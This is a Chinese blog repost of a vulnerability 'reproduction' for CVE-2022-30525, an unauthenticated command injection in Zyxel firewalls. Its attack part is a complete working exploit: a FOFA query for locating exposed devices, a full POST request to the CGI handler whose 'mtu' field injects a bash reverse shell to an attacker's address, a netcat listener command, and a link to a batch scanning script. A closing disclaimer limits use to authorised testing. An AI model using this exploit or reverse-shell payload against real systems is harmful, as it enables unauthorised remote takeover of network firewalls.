本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
2022 年 5 月 12 日,zyxel(合勤)发布安全公告,修复了其防火墙设备中未经身份验证的远程命令注入漏洞(CVE-2022-30525),该漏洞的CVSS评分为9.8。该漏洞存在于某些Zyxel防火墙版本的 CGI 程序中,允许在未经身份验证的情况下在受影响设备上以nobody用户身份执行任意命令。
![图片[1]-CVE-2022-30525 Zyxel 防火墙命令注入漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd135746.png)
0x03 漏洞复现
漏洞影响:
![图片[2]-CVE-2022-30525 Zyxel 防火墙命令注入漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd135802.png)
fofa:body=”USG FLEX 50 (USG20-VPN)” 等
1.执行反弹shell命令
POST /ztp/cgi-bin/handler HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 175
{"command":"setWanPortSt","proto":"dhcp","port":"1270","vlan_tagged"
:"1270","vlanid":"1270","mtu":"; bash -c 'exec bash -i &>/dev/tcp/ip/port <&1';","data":"hi"}![图片[3]-CVE-2022-30525 Zyxel 防火墙命令注入漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd135833.png)
2. nc监听得到shell
nc -lvvp 7777![图片[4]-CVE-2022-30525 Zyxel 防火墙命令注入漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd135852.png)
3. 批量验证参考脚本
http://github.com/Henry4E36/CVE-2022-30525/© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
请登录后查看评论内容